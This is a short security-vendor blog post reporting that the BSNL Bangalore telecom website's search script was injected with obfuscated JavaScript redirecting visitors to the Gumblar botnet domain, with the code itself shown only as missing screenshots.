By: ThreatLabz

BSNL, Bangalore Website Yet Another Victim Of Malicious Code Injection

Compromise

BSNL, Bangalore telecom district has become yet another victim of poor website security and has been infected with malicious JavaScript code. This time, the code points to a malicious domain used by the popular Gumblar botnet. Recently, my colleague Pradeep blogged about two Indian websites, ICWAI and KVGBANK that were also infected with malicious content. The "http://www.bangaloretelecom.com" site provides information on telecommunications services offered, telephone number search, online payment of bills, etc. This is yet another example of a
popular website in India which has been compromised. Here is the screenshot of home page:
 

 

Interestingly, the home page does not contain malicious content, but rather the malicious JavaScript has been injected into one of the “.js” files used for searching the content of the website. If you look at the above screenshot, you will see small search box. The attack will be activated if you search on anything using this functionality. Below is a screenshot of the search page a user is redirected to:

 

 

The source code of this page contains various “.js” files. The “search.js” file is infected with malicious JavaScript code. Here is the source code of that file:

 

 

The malicious JavaScript code is inserted at the bottom of this “.js” file. Here is the malicious content:

 

There are six different malicious JavaScript snippets, each obfuscated in a different way, but all ultimately point to same malicious domain. Let’s investigate one of them:

 

 

The decoded script is shown below:

 

 

The above malicious code points to the malicious domain “gumblar.cn”, which was used by the Gumblar Trojan. Fortunately, the malicious domain has now been taken down.

 

Zscaler blocks the infected page (http://bangaloretelecom.com/search.js) rather than blocking whole website. This example illustrates how malicious content can be filtered out, while still allowing access to what is an otherwise legitimate site – an important approach, given the prevalence of malicious infections. Our recent posts highlight the fact that numerous popular Indian web sites are struggling with proper application security controls.

 

Umesh

Learn more about Zscaler.